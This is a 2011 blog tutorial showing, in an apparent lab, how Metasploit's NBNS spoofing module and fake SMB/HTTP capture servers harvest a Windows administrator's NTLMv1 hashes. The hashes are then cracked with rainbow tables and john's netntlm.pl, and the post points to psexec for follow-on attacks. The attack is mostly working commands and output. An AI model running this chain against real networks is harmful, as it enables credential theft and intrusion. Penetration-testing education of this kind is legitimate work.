Friday, April 15, 2011

Metasploit NBNS Auxiliary FTW

Metasploit's NBNS auxillary module in action. I will be using Metasploit Express for the exercise. The objective is to gain access to victim's password.


This video is based on Packetstan's awesome tutorial. Do check it out here for full details:
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html


Let's begin..
First we start the Metasploit auxiliary NBNS module:
    auxiliary/spoof/nbns/nbns_response
        -> NBNS queries are sent out as broadcast. So we will now intercept the requests and send our spoofed NBNS responses to the victim. This will poison the name lookup.
msf auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   REGEX    .*               yes       Regex applied to determene if spoofed reply is sent
   SPOOFIP  172.72.5.1       yes       IP address with which to poison responses
   VERBOSE  true             no        Determines whether to display responses

msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) > 

As soon as an end-client sends out a name resolution query, our NBNS response server responds back saying it's the one the client is looking for.
[*] Packet Recieved from 172.72.5.139
[*] Regex matched PLAYGROUND1 from 172.72.5.139. Sending reply...
Now that we have controlled the name resolution, we can start rogue / fake services at our end - such as a file server [ smb ], and a web server [ http ].



The idea is to set up these fake services, and capture the hashes when the victim attempts to access them.


Configure and start the following modules:
auxiliary/server/capture/smb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE     /tmp/smblog       no        The local filename to store the captured hashes
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > show options
Module options (auxiliary/server/capture/http_ntlm):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   LOGFILE     /tmp/httplog      no        The local filename to store the captured hashes
   PWFILE                        no        The local filename to store the hashes in Cain&Abel format
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80                yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                 no        The URI to use for this exploit (default is random)

When the user attempts to authenticate / access the SMB / HTTP services, our rogue server responds and the end-client sends it's hashed credentials for getting authenticated.
msf auxiliary(smb) > [*] 2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a


msf auxiliary(http_ntlm) > [*] Packet Recieved from 172.72.5.139
[*] Regex matched SERVER from 172.72.5.139. Sending reply...
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058

[*] 172.72.5.139: PLAYGROUND1\Administrator 76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a on PLAYGROUND1
We have configured logging location in module options and these hashes are captured in their respective log files.
root@victor:Tools# cat /tmp/smblog
2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a

root@victor:Tools# cat /tmp/httplog
2011-04-19 16:17:49 +0530:172.72.5.139:PLAYGROUND1:PLAYGROUND1:Administrator:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a


But these hashes are salted with a challenge, which means cracking them is not feasible. For salted hashes, we will use Rainbow tables.


Download the free Rainbow tables here:
ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/


Using rcracki [ http://sourceforge.net/projects/rcracki/ ] and the rainbow tables, we now crack the first half of the LM hash. We only have to take first 16 characters from the LM hash and use it with rcracki_mt as follows:
./rcracki_mt -h <first 16 chars of LM hash> /path/to/rainbowtables/
[ First 16 chars of LM hash in this instance -> 76365e2d142b5612 ]


So the command I run is:
./rcracki_mt -h 76365e2d142b5612 /halflmchall_all-space#1-7_0/
First portion cracked
### output snipped ### 
statistics
-------------------------------------------------------
plaintext found:            1 of 1 (100.00%)
total disk access time:     23.17 s
total cryptanalysis time:   16.95 s
total pre-calculation time: 260.47 s
total chain walk step:      199970001
total false alarm:          1669
total chain walk step due to false alarm: 12603773
result
-------------------------------------------------------
76365e2d142b5612    PASSWOR    hex:50415353574f52
### output snipped ### 
Aha..we have got first portion of the password [ PASSWOR ]. Now we feed this portion of password as a seed to netntlm.pl [ found in john install directory ]. The input file should have the hashes in john-compatible format [ from smblog ] or in the following format from httplog:
<user>:::<LMHASH>:<NTLMHASH>:<Metasploit_static_CHALLENGE>
i.e. in the format as follows ->
root@victor:Tools# cat /tmp/nbns
playground\administrator:::76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a:1122334455667788

netntlm.pl is run as follows:
./netntml.pl --seed <first_portion> --file nbns
root@victor:run#./netntml.pl --seed PASSWOR --file /tmp/nbns
So we have the uppercase password -> PASSWORK


Now we have got the full password. But as we can see here, it is all uppercase. We need to run it through the previous command again - i.e.
root@victor:run#./netntml.pl --seed PASSWORK --file /tmp/nbns 
- and we will get the password in it's true case.
Performing NTLM case-sensitive crack for account: playground\administrator.
guesses: 1  time: 0:00:00:00 100.00% (ETA: Tue Apr 12 17:19:56 2011)  c/s: 1163  trying: passwork
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
passwork         (playground\administrator)

We found the true case password -> "passwork" :)
We have the password and can now use it in further attacks such as using psexec.!

Metasploit's Auxilary module netbios name spoofer is very convenient and effective in a pen test. Start the module, then set up fake services like smb / http, and then just lay back n watch hashes pop up...!



Thank You for watching!

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.